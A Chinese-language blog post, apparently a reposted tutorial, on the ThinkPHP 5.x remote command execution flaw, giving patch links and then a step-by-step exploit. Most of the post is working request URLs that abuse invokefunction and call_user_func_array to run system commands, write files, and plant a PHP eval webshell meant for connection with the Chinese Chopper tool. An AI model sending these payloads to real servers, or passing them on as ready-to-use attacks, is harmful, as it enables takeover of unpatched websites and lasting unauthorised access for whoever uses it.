ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell)
前言ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。https://blog.bbskali.cn/usr/uploads/2018/12/3763557592.png漏洞分析Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756fThinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815关键代码:// 获取控制器名$controller = strip_tags($result ?: $this->rule->getConfig('default_controller'));ShellCopy
在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入符号来调用任意类方法。漏洞利用执行系统命令显示目录下文件http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars=system&vars[]=ls%20-lShell
Copy
https://blog.bbskali.cn/usr/uploads/2018/12/288345523.png执行phpinfohttp://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars=system&vars[]=php%20-r%20'phpinfo();'Shell
Copy
https://blog.bbskali.cn/usr/uploads/2018/12/2074734663.png写info.php文件http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars=system&vars[]=echo%20%27<?php%20phpinfo();?>%27%20>%20info.phpShell
Copy
访问 info.php
https://blog.bbskali.cn/usr/uploads/2018/12/909272504.png同理,我们可以利用此方法写入PHP一句话木马。index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars=system&vars[]=echo%20%27<?php @eval($_POST['c']);?>%27%20>%20inf.phpShell
Copy
然后我们用菜刀连接即可。
页:
[1]